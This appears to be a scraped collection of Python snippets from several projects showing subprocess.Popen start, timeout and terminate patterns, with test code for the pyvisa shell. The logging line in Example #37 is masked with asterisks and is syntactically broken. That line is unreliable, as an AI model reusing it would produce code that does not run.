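The class above defines __exit__ but no __enter__, so `with` support needs one more method; a minimal hypothetical subclass wrapping `cat`:

class CatWrapper(AbstractSubprocessClass):
    options = []  # the base class expects subclasses to provide this

    def __enter__(self):
        self.start()
        return self

with CatWrapper('cat') as echoer:
    echoer._process.stdin.write(b'hello\n')
    echoer._process.stdin.flush()
    print(echoer._process.stdout.readline())  # -> b'hello\n'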
Example #29
class ProcessThread(threading.Thread):
    def __init__(self,cmd,):
        threading.Thread.__init__(self)
        self.cmd = cmd
        self.iface = None
        self.process = None
        self.logger = False
        self.prompt = True

    def run(self):
        print 'Starting Thread:' + self.name
        if self.name == 'Dns2Proxy':
            setup_logger('dns2proxy', './Logs/AccessPoint/dns2proxy.log')
            log_dns2proxy = logging.getLogger('dns2proxy')
            self.logger = True
        self.process = Popen(self.cmd,stdout=PIPE,stderr=STDOUT)
        for line in iter(self.process.stdout.readline, b''):
            if self.logger:
                if self.name == 'Dns2Proxy':
                    log_dns2proxy.info(line.rstrip())
                    self.prompt = False
            if self.prompt:
                print (line.rstrip())

    def stop(self):
        print 'Stop thread:' + self.name
        if self.process is not None:
            self.process.terminate()
            self.process = None
Example #30
def _launch_kernel(cmd):
    """start an embedded kernel in a subprocess, and wait for it to be ready
    
    Returns
    -------
    kernel, kernel_manager: Popen instance and connected KernelManager
    """
    kernel = Popen([sys.executable, '-c', cmd], stdout=PIPE, stderr=PIPE, env=env)
    connection_file = os.path.join(IPYTHONDIR,
                                    'profile_default',
                                    'security',
                                    'kernel-%i.json' % kernel.pid
    )
    # wait for connection file to exist, timeout after 5s
    tic = time.time()
    while not os.path.exists(connection_file) and kernel.poll() is None and time.time() < tic + 5:
        time.sleep(0.1)
    
    if not os.path.exists(connection_file):
        if kernel.poll() is None:
            kernel.terminate()
        raise IOError("Connection file %r never arrived" % connection_file)
    
    if kernel.poll() is not None:
        raise IOError("Kernel failed to start")
    
    km = BlockingKernelManager(connection_file=connection_file)
    km.load_connection_file()
    km.start_channels()
    
    return kernel, km
Example #31
def main():
    """
    pipe ffmpeg pre-process to final ffmpeg post-process,
    or play with ffplay
    """
    year = get_date(False).split('-')[0]
    overlay = []

    ff_pre_settings = [
        '-pix_fmt', 'yuv420p', '-r', str(_pre_comp.fps),
        '-c:v', 'mpeg2video', '-intra',
        '-b:v', '{}k'.format(_pre_comp.v_bitrate),
        '-minrate', '{}k'.format(_pre_comp.v_bitrate),
        '-maxrate', '{}k'.format(_pre_comp.v_bitrate),
        '-bufsize', '{}k'.format(_pre_comp.v_bufsize),
        '-c:a', 's302m', '-strict', '-2',
        '-ar', '48000', '-ac', '2',
        '-f', 'mpegts', '-']

    if os.path.isfile(_text.textfile):
        logger.info('Overlay text file: "{}"'.format(_text.textfile))
        overlay = [
            '-vf', ("drawtext=box={}:boxcolor='{}':boxborderw={}"
                    ":fontsize={}:fontcolor={}:fontfile='{}':textfile={}"
                    ":reload=1:x='{}':y='{}'").format(
                        _text.box, _text.boxcolor, _text.boxborderw,
                        _text.fontsize, _text.fontcolor, _text.fontfile,
                        _text.textfile, _text.x, _text.y)
        ]

    try:
        if _playout.preview:
            # preview playout to player
            encoder = Popen([
                'ffplay', '-hide_banner', '-nostats', '-i', 'pipe:0'
                ] + overlay, stderr=None, stdin=PIPE, stdout=None)
        else:
            encoder = Popen([
                'ffmpeg', '-v', 'info', '-hide_banner', '-nostats',
                '-re', '-thread_queue_size', '256',
                '-i', 'pipe:0'] + overlay + _playout.post_comp_video
                + _playout.post_comp_audio + [
                    '-metadata', 'service_name=' + _playout.name,
                    '-metadata', 'service_provider=' + _playout.provider,
                    '-metadata', 'year={}'.format(year)
                ] + _playout.post_comp_extra + [_playout.out_addr], stdin=PIPE)

        if _playlist.mode and not stdin_args.folder:
            watcher = None
            get_source = GetSourceIter(encoder)
        else:
            logger.info("start folder mode")
            media = MediaStore()
            watcher = MediaWatcher(media)
            get_source = GetSource(media)

        try:
            for src_cmd in get_source.next():
                logger.debug('src_cmd: "{}"'.format(src_cmd))
                if src_cmd[0] == '-i':
                    current_file = src_cmd[1]
                else:
                    current_file = src_cmd[3]

                logger.info('play: "{}"'.format(current_file))

                with Popen([
                    'ffmpeg', '-v', 'error', '-hide_banner', '-nostats'
                    ] + src_cmd + ff_pre_settings,
                        stdout=PIPE) as decoder:
                    copyfileobj(decoder.stdout, encoder.stdin)

        except BrokenPipeError:
            logger.error('Broken Pipe!')
            terminate_processes(decoder, encoder, watcher)

        except SystemExit:
            logger.info("got close command")
            terminate_processes(decoder, encoder, watcher)

        except KeyboardInterrupt:
            logger.warning('program terminated')
            terminate_processes(decoder, encoder, watcher)

        # close the encoder when there is nothing left to do
        if encoder.poll() is None:
            encoder.terminate()

    finally:
        encoder.wait()
Example #32
class ServerRunner(BaseRunner):

    port = None
    notebook_dir = os.path.join(EIN_ROOT, "tests", "notebook")

    def __enter__(self):
        self.run()
        return self.port

    def __exit__(self, type, value, traceback):
        self.stop()

    def do_run(self):
        self.clear_notebook_dir()
        self.start()
        self.get_port()
        print("Server running at", self.port)

    def clear_notebook_dir(self):
        files = glob.glob(os.path.join(self.notebook_dir, '*.ipynb'))
        list(map(os.remove, files))
        print("Removed {0} ipynb files".format(len(files)))

    @staticmethod
    def _parse_port_line(line):
        port = line.strip().rsplit(':', 1)[-1].strip('/')
        return port

    def get_port(self):
        if self.port is None:
            val = self.proc.stdout.readline()
            dval = val.decode('utf-8')
            self.port = self._parse_port_line(dval)
        return self.port

    def start(self):
        from subprocess import Popen, PIPE, STDOUT
        self.proc = Popen(self.command,
                          stdout=PIPE,
                          stderr=STDOUT,
                          stdin=PIPE,
                          shell=True)
        # Answer "y" to the prompt: Shutdown Notebook Server (y/[n])?
        self.proc.stdin.write(b'y\n')

    def stop(self):
        print("Stopping server", self.port)
        returncode = self.proc.poll()
        if returncode is not None:
            logpath = self.logpath('server')
            print("Server process was already dead by exit code", returncode)
            print("*" * 50)
            print("Showing {0}:".format(logpath))
            print(open(logpath).read())
            print()
            return
        if not self.dry_run:
            try:
                kill_subprocesses(self.proc.pid, lambda x: 'ipython' in x)
            finally:
                self.proc.terminate()

    @property
    def command(self):
        fmtdata = dict(
            notebook_dir=self.notebook_dir,
            ipython=self.ipython,
            server_log=self.logpath('server'),
        )
        return self.command_template.format(**fmtdata)

    command_template = r"""{ipython} notebook --notebook-dir {notebook_dir} --no-browser --debug 2>&1 | tee {server_log} | grep --line-buffered 'Notebook is running at' | head -n1"""
Example #33
class Service:
    def __init__(
        self,
        args,
        *,
        name=None,
        env=None,
        timeout=5,
        poll_interval=0.2,
        process_settings=None,
    ):
        self.args = args
        self.name = name
        self.env = env
        self.timeout = timeout
        self.poll_interval = poll_interval
        self.process = None
        self._process_settings = process_settings

        if self._process_settings is None:
            self._process_settings = {}

    def start(self):
        """Starts the service and wait for it to be up """
        if self.process:
            raise ServiceAlreadyStarted
        self.process = Popen(self.args, env=self.env, **self._process_settings)
        try:
            self._wait_for_up()
            return self.process
        except TimeoutException:
            self.terminate()
            raise

    def is_up(self):
        """Determine if the service is up; subclasses should override this
        with a real readiness check."""
        return True

    def _wait_for_up(self):
        with Timer(self.timeout) as timer:
            while True:
                is_up = self.is_up()

                if not is_up:
                    if timer.is_timed_out():
                        raise TimeoutException(
                            f"Service {self.name} did not report to be up after {self.timeout} seconds"
                        )
                    else:
                        time.sleep(min(self.poll_interval, timer.time_left))
                else:
                    break

    def terminate(self):
        if self.process is None:
            return
        try:
            self.process.terminate()
            self.process.wait(timeout=5)
        except subprocess.TimeoutExpired:
            warnings.warn(
                f"{self.name} did not terminate in time and had to be killed")
            self.process.kill()
            self.process.wait(timeout=5)
        self.process = None
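
A hypothetical use of the Service class; in practice is_up() would be overridden with a real readiness probe:

svc = Service(['python', '-m', 'http.server', '8000'], name='httpd', timeout=10)
svc.start()  # blocks until is_up() reports ready (or TimeoutException)
try:
    pass     # ... interact with the service ...
finally:
    svc.terminate()  # graceful terminate, falling back to kill()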
Example #34
File: test_shell.py Project: xl-w/pyvisa
class TestVisaShell(BaseTestCase):
    """Test the VISA shell.

    """
    def setUp(self):
        """Start the shell in a subprocess.

        """
        os.environ["COVERAGE_PROCESS_START"] = ".coveragerc"
        self.shell = Popen(["pyvisa-shell"], stdin=PIPE, stdout=PIPE)
        self.reader = SubprocessOutputPoller(self.shell)
        self.reader.data_ready.wait(1)
        self.reader.get_lines()

    def open_resource(self):
        lines = self.communicate(
            f"open {list(RESOURCE_ADDRESSES.values())[0]}")
        self.assertIn(b"has been opened.", lines[0])

    def communicate(self, msg):
        """Write a message on stdin and collect the answer.

        """
        self.shell.stdin.write(msg.encode("ascii") + b"\n")
        self.shell.stdin.flush()
        self.reader.data_ready.wait(1)
        return self.reader.get_lines()

    def tearDown(self):
        if self.shell:
            self.shell.stdin.write(b"exit\n")
            self.shell.stdin.flush()
            self.shell.stdin.close()
            self.shell.terminate()
            self.shell.wait(0.1)
            self.reader.shutdown()

    def test_complete_open(self):
        """Test providing auto-completion for open.

        """
        shell = VisaShell()
        completions = shell.complete_open("TCPIP", 0, 0, 0)
        self.assertIn(to_canonical_name(RESOURCE_ADDRESSES["TCPIP::INSTR"]),
                      completions)

        # Test getting an alias from the completion
        completions = shell.complete_open("tcp", 0, 0, 0)
        self.assertIn("tcpip", completions)

    def test_list(self):
        """Test listing the connected resources.

        """
        lines = self.communicate("list")

        msg = []
        for i, rsc in enumerate(RESOURCE_ADDRESSES.values()):
            msg.append(f"({i:2d}) {to_canonical_name(rsc)}")
            if rsc in ALIASES:
                msg.append(f"     alias: {ALIASES[rsc]}")

        for line, m in zip(lines, msg):
            self.assertIn(m.encode("ascii"), line)

    # TODO fix argument handling to allow filtering

    def test_list_handle_error(self):
        """Test handling an error in listing resources.

        """
        shell = VisaShell()
        shell.resource_manager = None
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_list("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_open_no_args(self):
        """Test opening without any argument.

        """
        lines = self.communicate("open")
        self.assertIn(b"A resource name must be specified.", lines[0])

    def test_open_by_number(self):
        """Test opening based on the index of the resource.

        """
        lines = self.communicate("open 0")
        self.assertIn(b'Not a valid resource number. Use the command "list".',
                      lines[0])

        lines = self.communicate("list")
        lines = self.communicate("open 0")
        rsc = list(RESOURCE_ADDRESSES.values())[0]
        self.assertIn(
            f"{to_canonical_name(rsc)} has been opened.".encode("ascii"),
            lines[0])

        lines = self.communicate("open 0")
        self.assertIn(
            (b"You can only open one resource at a time. "
             b"Please close the current one first."),
            lines[0],
        )

    def test_open_by_address(self):
        """Test opening based on the resource address.

        """
        rsc = list(RESOURCE_ADDRESSES.values())[0]
        lines = self.communicate(f"open {rsc}")
        self.assertIn(f"{rsc} has been opened.".encode("ascii"), lines[0])

    def test_open_handle_exception(self):
        """Test handling an exception during opening.

        """
        lines = self.communicate('open ""')
        self.assertIn(b"VI_ERROR_INV_RSRC_NAME", lines[0])

    def test_handle_double_open(self):
        """Test handling before closing resource.

        """
        rsc = list(RESOURCE_ADDRESSES.values())[0]
        lines = self.communicate(f"open {rsc}")
        lines = self.communicate(f"open {rsc}")
        self.assertIn(
            (b"You can only open one resource at a time. "
             b"Please close the current one first."),
            lines[0],
        )

    def test_command_on_closed_resource(self):
        """Test all the commands that cannot be run without opening a resource.

        """
        for cmd in ("close", "write", "read", "query", "termchar", "timeout",
                    "attr"):
            lines = self.communicate(cmd)
            self.assertIn(
                b'There are no resources in use. Use the command "open".',
                lines[0])

    def test_close(self):
        """Test closing a resource.

        """
        rsc = list(RESOURCE_ADDRESSES.values())[0]
        lines = self.communicate(f"open {rsc}")
        self.assertIn(b"has been opened.", lines[0])
        lines = self.communicate("close")
        self.assertIn(b"The resource has been closed.", lines[0])

        lines = self.communicate(f"open {rsc}")
        self.assertIn(b"has been opened.", lines[0])

    def test_close_handle_error(self):
        """Test handling an error while closing.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_close("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_query(self):
        """querying a value from the instrument.

        """
        self.open_resource()
        lines = self.communicate("query *IDN?")
        self.assertIn(b"Response:", lines[0])

    def test_query_handle_error(self):
        """Test handling an error in query.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_query("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_read_write(self):
        """Test writing/reading values from the resource.

        """
        self.open_resource()
        lines = self.communicate("write *IDN?")
        lines = self.communicate("read")
        self.assertIn(b"Keysight ", lines[0])

    def test_read_handle_error(self):
        """Test handling an error in read.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_read("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_write_handle_error(self):
        """Test handling an error in write.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_write("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_timeout_get(self):
        """Test accessing the timeout.

        """
        self.open_resource()
        lines = self.communicate("timeout")
        self.assertIn(b"Timeout: ", lines[0])

    def test_timeout_get_handle_error(self):
        """Test handling an error in getting teh timeout.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_timeout("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_timeout_set(self):
        """Test setting the timeout.

        """
        self.open_resource()
        lines = self.communicate("timeout 1000")
        self.assertIn(b"Done", lines[0])
        lines = self.communicate("timeout")
        self.assertIn(b"Timeout: 1000ms", lines[0])

    def test_timeout_set_handle_error(self):
        """Test handling an error in setting the timeout

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_timeout("1000")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_print_attr_list(self):
        """Test printing attribute list.

        """
        class FalseResource:
            @classmethod
            def get_visa_attribute(cls, id):
                if id == constants.VI_ATTR_TMO_VALUE:
                    raise errors.VisaIOError(constants.VI_ERROR_NSUP_ATTR)
                elif id == constants.VI_ATTR_INTF_NUM:
                    raise Exception("Long text: aaaaaaaaaaaaaaaaaaaa")
                else:
                    raise Exception("Test")

        FalseResource.visa_attributes_classes = Resource.visa_attributes_classes

        shell = VisaShell()
        shell.current = FalseResource

        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.print_attribute_list()

        output = temp_stdout.getvalue()
        self.assertIn("Long text:...", output)

    def test_attr_no_args(self):
        """Test getting the list of attributes

        """
        self.open_resource()
        lines = self.communicate("attr")
        self.assertIn(b"VISA name", lines[1])

    def test_attr_too_many_args(self):
        """Test handling wrong args to attr.

        """
        self.open_resource()
        lines = self.communicate("attr 1 2 3")
        self.assertIn(
            b"Invalid syntax, use `attr <name>` to get;"
            b" or `attr <name> <value>` to set",
            lines[0],
        )

    def test_issue_in_getting_attr(self):
        """Test handling exception in getting an attribute.

        """
        shell = VisaShell()
        shell.do_open(list(RESOURCE_ADDRESSES.values())[0])

        def broken_get_visa_attribute(self, name=""):
            raise Exception("Exception")

        # Issue on VI_
        old = Resource.get_visa_attribute
        Resource.get_visa_attribute = broken_get_visa_attribute
        try:
            temp_stdout = StringIO()
            with redirect_stdout(temp_stdout):
                try:
                    shell.do_attr("VI_ATTR_TERMCHAR")
                finally:
                    Resource.get_visa_attribute = old
            output = temp_stdout.getvalue()
            self.assertIn("Exception", output)
        finally:
            Resource.get_visa_attribute = old

        # Issue on aliased attr
        old = type(shell.current).allow_dma
        type(shell.current).allow_dma = property(broken_get_visa_attribute)
        try:
            temp_stdout = StringIO()
            with redirect_stdout(temp_stdout):
                shell.do_attr("allow_dma")
            output = temp_stdout.getvalue()
            self.assertIn("Exception", output)
        finally:
            type(shell.current).allow_dma = old

    def test_attr_get_set_by_VI_non_boolean(self):
        """Test getting/setting an attr using the VI_ name (int value)

        """
        self.open_resource()
        msg = "attr VI_ATTR_TERMCHAR {}".format(ord("\r"))
        lines = self.communicate(msg)
        self.assertIn(b"Done", lines[0])

        lines = self.communicate("attr VI_ATTR_TERMCHAR")
        self.assertIn(str(ord("\r")), lines[0].decode("ascii"))

    def test_attr_get_set_by_VI_boolean(self):
        """Test getting/setting an attr using the VI_ name (bool value)

        """
        self.open_resource()
        for v in (False, True):
            msg = f"attr VI_ATTR_TERMCHAR_EN {v}"
            lines = self.communicate(msg)
            self.assertIn(b"Done", lines[0])

            lines = self.communicate("attr VI_ATTR_TERMCHAR_EN")
            self.assertIn(str(int(v)).encode("ascii"), lines[0])

    def test_attr_get_by_VI_handle_error(self):
        """Test accessing an attr by an unknown VI name.

        """
        self.open_resource()
        lines = self.communicate("attr VI_test")
        self.assertIn(b"no attribute", lines[0])

    def test_attr_get_by_name(self):
        """Test accessing an attr by Python name.

        """
        self.open_resource()
        lines = self.communicate("attr allow_dma")
        self.assertTrue(b"True" in lines[0] or b"False" in lines[0])

    def test_attr_get_by_name_handle_error(self):
        """Test accessing an attr by an unknown Python name.

        """
        self.open_resource()
        lines = self.communicate("attr test")
        self.assertIn(b"no attribute", lines[0])

    def test_attr_set_by_VI_handle_error_unknown_attr(self):
        """Test handling issue in setting VI attr which does not exist.

        """
        self.open_resource()
        lines = self.communicate("attr VI_test test")
        self.assertIn(b"no attribute", lines[0])

    def test_attr_set_by_VI_handle_error_non_boolean(self):
        """Test handling issue in setting VI attr. (non boolean value)

        """
        self.open_resource()
        msg = "attr VI_ATTR_TERMCHAR_EN Test"
        lines = self.communicate(msg)
        self.assertIn(b"Error", lines[0])

    def test_attr_set_by_VI_handle_error_non_integer(self):
        """Test handling issue in setting VI attr. (non integer value)

        """
        self.open_resource()
        msg = "attr VI_ATTR_TERMCHAR Test"
        lines = self.communicate(msg)
        self.assertIn(b"Error", lines[0])

    def test_attr_set_by_VI_handle_error_wrong_value(self):
        """Test handling issue in setting VI attr by name. (wrong value)

        """
        self.open_resource()
        msg = "attr VI_ATTR_TERMCHAR -1"
        lines = self.communicate(msg)
        self.assertIn(b"VI_ERROR_NSUP_ATTR_STATE", lines[0])

    def test_attr_set_by_name_handle_error(self):
        """Test handling attempt to set attr by name (which is not supported).

        """
        self.open_resource()
        msg = "attr allow_dma Test"
        lines = self.communicate(msg)
        self.assertIn(
            b"Setting Resource Attributes by python name is not yet "
            b"supported.",
            lines[0],
        )

    def test_complete_attr(self):
        """Test providing auto-completion for attrs.

        """
        shell = VisaShell()
        shell.do_open(list(RESOURCE_ADDRESSES.values())[0])
        completions = shell.complete_attr("VI_ATTR_TERM", 0, 0, 0)
        self.assertIn("VI_ATTR_TERMCHAR", completions)
        self.assertIn("VI_ATTR_TERMCHAR_EN", completions)

        completions = shell.complete_attr("allow_d", 0, 0, 0)
        self.assertIn("allow_dma", completions)

    def test_termchar_get_handle_error(self):
        """Test handling error when getting the termchars.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_termchar("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_getting_termchar_absent_mapping(self):
        """Test getting a termchar that does not map to something with a representation.

        """
        shell = VisaShell()
        shell.do_open(list(RESOURCE_ADDRESSES.values())[0])
        shell.current.read_termination = "X"
        shell.current.write_termination = "Z"
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_termchar("")
        output = temp_stdout.getvalue()
        self.assertSequenceEqual("Termchar read: X write: Z",
                                 output.split("\n")[0])

    def test_termchar_get_set_both_identical(self):
        """Test setting both termchars to the same value.

        """
        self.open_resource()
        lines = self.communicate("termchar CR")
        self.assertIn(b"Done", lines[0])

        lines = self.communicate("termchar")
        self.assertIn(b"Termchar read: CR write: CR", lines[0])

    def test_termchar_get_set_both_different(self):
        """Test setting both termchars to different values.

        """
        self.open_resource()
        lines = self.communicate("termchar CR NUL")
        self.assertIn(b"Done", lines[0])

        lines = self.communicate("termchar")
        self.assertIn(b"Termchar read: CR write: NUL", lines[0])

    def test_termchar_set_too_many_args(self):
        """Test handling to many termchars to termchar.

        """
        self.open_resource()
        lines = self.communicate("termchar 1 2 3")
        self.assertIn(b"Invalid syntax", lines[0])

    def test_termchar_set_handle_error_wrong_value(self):
        """Test handling wrong value in setting termchar.

        """
        self.open_resource()
        lines = self.communicate("termchar tt")
        self.assertIn(b"use CR, LF, CRLF, NUL or None to set termchar",
                      lines[0])

    def test_termchar_set_handle_error(self):
        """Test handling an error in setting the termchars.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_termchar("CR")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_eof(self):
        """Test handling an EOF.

        """
        shell = VisaShell()
        self.assertTrue(shell.do_EOF(None))
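
The tests above talk to the shell through a communicate() helper that is not
part of this excerpt. A minimal sketch of what such a helper might look like,
assuming the pyvisa-shell console entry point (the command name and the
trailing "exit" are assumptions, not the real harness):

import subprocess

def communicate(msg, timeout=10):
    # Spawn the shell, feed it one command followed by "exit", and
    # return the raw output lines for the assertions above.
    proc = subprocess.Popen(["pyvisa-shell"],
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    try:
        stdout, _ = proc.communicate(msg.encode("ascii") + b"\nexit\n",
                                     timeout=timeout)
    finally:
        if proc.poll() is None:  # e.g. communicate() timed out
            proc.terminate()
    return stdout.splitlines()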
Example #35
    def _run_sub(self, cmd, queue):
        """
        Run a command in a subprocess.
        """
        try:
            add_queue_to_env(queue)

            if self.nocapture:
                out = sys.stdout
            else:
                out = open(os.devnull, 'w')

            errfd, tmperr = mkstemp()
            err = os.fdopen(errfd, 'w')

            p = Popen(cmd,
                      stdout=out,
                      stderr=err,
                      env=os.environ,
                      universal_newlines=True)  # text mode
            count = 0
            timedout = False

            if self.timeout < 0.0:  # infinite timeout
                p.wait()
            else:
                poll_interval = 0.2
                while p.poll() is None:
                    if count * poll_interval > self.timeout:
                        p.terminate()
                        timedout = True
                        break
                    time.sleep(poll_interval)
                    count += 1

            err.close()

            with open(tmperr, 'r') as f:
                errmsg = f.read()
            os.remove(tmperr)

            os.environ['TESTFLO_QUEUE'] = ''

            if timedout:
                result = self
                self.status = 'FAIL'
                self.err_msg = 'TIMEOUT after %s sec. ' % self.timeout
                if errmsg:
                    self.err_msg += errmsg
            else:
                if p.returncode != 0:
                    print(errmsg)
                result = queue.get()
        except:
            # we generally shouldn't get here, but just in case,
            # handle it so that the main process doesn't hang at the
            # end when it tries to join all of the concurrent processes.
            self.status = 'FAIL'
            self.err_msg = traceback.format_exc()
            result = self

            if 'err' in locals():  # the failure may predate opening the log
                err.close()
        finally:
            if not self.nocapture and 'out' in locals():
                out.close()
            sys.stdout.flush()
            sys.stderr.flush()

        return result
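
The poll/sleep loop above is the portable way to bound a child's runtime
without communicate(). Isolated into a helper, the same logic reads as
follows (a sketch, not part of the original module):

import time

def wait_with_timeout(proc, timeout, poll_interval=0.2):
    # Return True if proc finished within timeout seconds; otherwise
    # terminate it and return False. A negative timeout waits forever.
    if timeout < 0.0:
        proc.wait()
        return True
    waited = 0.0
    while proc.poll() is None:
        if waited > timeout:
            proc.terminate()
            return False
        time.sleep(poll_interval)
        waited += poll_interval
    return True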
Example #36
def run_shell_command(command, use_shell=False, use_shlex=True, my_cwd=None,
                      my_env=None, stdout_logfile=None, stderr_logfile=None, stdin=None, my_timeout=24 * 60 * 60):
    """Run the given command as a shell and get the return code, stdout and stderr
        Returns True/False and return code.
    """
    from subprocess import PIPE, Popen

    if stdin is not None:
        stdin = stdin.encode('utf-8')

    if use_shlex:
        import shlex
        myargs = shlex.split(str(command))
        LOGGER.debug('Command sequence= ' + str(myargs))
    else:
        myargs = command

    try:
        proc = Popen(myargs,
                     cwd=my_cwd, shell=use_shell, env=my_env,
                     stderr=PIPE, stdout=PIPE, stdin=PIPE, close_fds=True)

        LOGGER.debug("Process pid: {}".format(proc.pid))
    except OSError as e:
        LOGGER.error("Popen failed for command: {} with {}".format(myargs, e))
        return False
    except ValueError:
        LOGGER.error("Popen called with invalid arguments.")
        return False
    except:
        LOGGER.error("Popen failed for an unknown reason.")
        return False

    import signal

    class Alarm(Exception):
        pass

    def alarm_handler(signum, frame):
        raise Alarm

    signal.signal(signal.SIGALRM, alarm_handler)  # SIGALRM-based timeout (Unix only)
    signal.alarm(my_timeout)
    try:
        LOGGER.debug("Before call to communicate:")
        if stdin is None:
            out, err = proc.communicate()
        else:
            out, err = proc.communicate(input=stdin)

        out = out.decode('utf-8')
        err = err.decode('utf-8')

        return_value = proc.returncode
        signal.alarm(0)
    except Alarm:
        LOGGER.error(
            "Command: {} took too long (more than {}s) to complete. Terminating the job.".format(command, my_timeout))
        proc.terminate()
        return False

    LOGGER.debug("communicate complete")
    lines = out.splitlines()
    if stdout_logfile is None:
        for line in lines:
            LOGGER.debug(line)
    else:
        try:
            with open(stdout_logfile, 'w') as _stdout:
                for line in lines:
                    _stdout.write(line + "\n")
        except IOError as e:
            LOGGER.error("IO operation to file stdout_logfile: {} failed with {}".format(stdout_logfile, e))
            return False

    errlines = err.splitlines()
    if stderr_logfile is None:
        for errline in errlines:
            LOGGER.debug(errline)
    else:
        try:
            with open(stderr_logfile, 'w') as _stderr:
                for errline in errlines:
                    _stderr.write(errline + "\n")
        except IOError as e:
            LOGGER.error("IO operation to file stderr_logfile: {} failed with {}".format(stderr_logfile, e))
            return False

    return True, return_value, out, err
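
Possible usage (a sketch; the command, log path, and LOGGER setup are
illustrative): callers must handle both return shapes, the bare False on
failure and the 4-tuple on completion.

result = run_shell_command('ls -l', stdout_logfile='/tmp/ls.out', my_timeout=60)
if result is False:
    LOGGER.error('command did not run')
else:
    ok, return_value, out, err = result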
Example #37
    def run(cls,
            request,
            process_type,
            bat_file,
            cancer_rates="UK",
            cwd="/tmp",
            niceness=0,
            name="",
            model=settings.BC_MODEL):
        """
        Run a process.
        @param request: HTTP request
        @param process_type: either pedigree.MUTATION_PROBS or pedigree.CANCER_RISKS.
        @param bat_file: batch file path
        @keyword cancer_rates: cancer incidence rates used in risk calculation
        @keyword cwd: working directory
        @keyword niceness: niceness value
        @keyword name: log name for calculation, e.g. REMAINING LIFETIME
        """
        if process_type == pedigree.MUTATION_PROBS:
            prog = os.path.join(model['HOME'], model['PROBS_EXE'])
            out = "can_probs"
        else:
            prog = os.path.join(model['HOME'], model['RISKS_EXE'])
            out = "can_risks"

        start = time.time()
        try:
            try:
                os.remove(os.path.join(
                    cwd, out + ".out"))  # ensure output file doesn't exist
            except OSError:
                pass

            # logger.debug(prog + ' -r ' + out+".out -v " + bat_file + " " +
            #              os.path.join(model['HOME'], "Data/incidence_rates_" + cancer_rates + ".nml"))
            process = Popen(
                [
                    prog,
                    '-r',
                    out + ".out",  # results file
                    '-v',  # include model version
                    bat_file,
                    os.path.join(
                        model['HOME'],
                        "Data/incidence_rates_" + cancer_rates + ".nml")
                ],
                cwd=cwd,
                stdout=PIPE,
                stderr=PIPE,
                env=settings.FORTRAN_ENV,
                # evaluate both calls as a tuple: with `and`, setrlimit would
                # be skipped whenever os.nice() returns 0
                preexec_fn=lambda: (os.nice(niceness), resource.setrlimit(
                    resource.RLIMIT_STACK,
                    (resource.RLIM_INFINITY, resource.RLIM_INFINITY))))

            (outs, errs) = process.communicate(
                timeout=settings.FORTRAN_TIMEOUT)  # timeout in seconds
            exit_code = process.wait()

            if exit_code == 0:
                with open(os.path.join(cwd, out + ".out"), 'r') as result_file:
                    data = result_file.read()
                logger.info(
                    model.get('NAME', "") + " " +
                    ("MUTATION PROBABILITY" if process_type ==
                     pedigree.MUTATION_PROBS else "RISK ") + name +
                    " CALCULATION: user="******"; elapsed time=" + str(time.time() - start))
                return data
            else:
                logger.error("EXIT CODE (" + out.replace('can_', '') + "): " +
                             str(exit_code))
                logger.error(outs)
                errs = errs.decode("utf-8").replace('\n', '')
                logger.error(errs)
                raise ModelError(errs)
        except TimeoutExpired as to:
            process.terminate()
            process.communicate()  # reap the child and drain its pipes
            logger.error(model.get('NAME', "") + " PROCESS TIMED OUT.")
            logger.error(to)
            raise TimeOutException()
        except Exception as e:
            logger.error(model.get('NAME', "") + ' PROCESS EXCEPTION: ' + cwd)
            logger.error(e)
            raise
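
The TimeoutExpired handling above follows the pattern recommended in the
subprocess documentation. Stripped of the surrounding class, the bare
mechanism looks like this (a sketch; the sleep command is illustrative):

from subprocess import PIPE, Popen, TimeoutExpired

process = Popen(['sleep', '60'], stdout=PIPE, stderr=PIPE)
try:
    outs, errs = process.communicate(timeout=5)
except TimeoutExpired:
    process.terminate()                  # or .kill() for a stubborn child
    outs, errs = process.communicate()   # reap it and drain the pipes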
Example #38
def test_external_proxy(request, io_loop):
    """Test a proxy started before the Hub"""
    auth_token = 'secret!'
    proxy_ip = '127.0.0.1'
    proxy_port = 54321

    app = MockHub.instance(
        proxy_api_ip=proxy_ip,
        proxy_api_port=proxy_port,
        proxy_auth_token=auth_token,
    )

    def fin():
        MockHub.clear_instance()
        app.stop()

    request.addfinalizer(fin)
    env = os.environ.copy()
    env['CONFIGPROXY_AUTH_TOKEN'] = auth_token
    cmd = app.proxy_cmd + [
        '--ip',
        app.ip,
        '--port',
        str(app.port),
        '--api-ip',
        proxy_ip,
        '--api-port',
        str(proxy_port),
        '--default-target',
        'http://%s:%i' % (app.hub_ip, app.hub_port),
    ]
    proxy = Popen(cmd, env=env)

    def _cleanup_proxy():
        if proxy.poll() is None:
            proxy.terminate()

    request.addfinalizer(_cleanup_proxy)

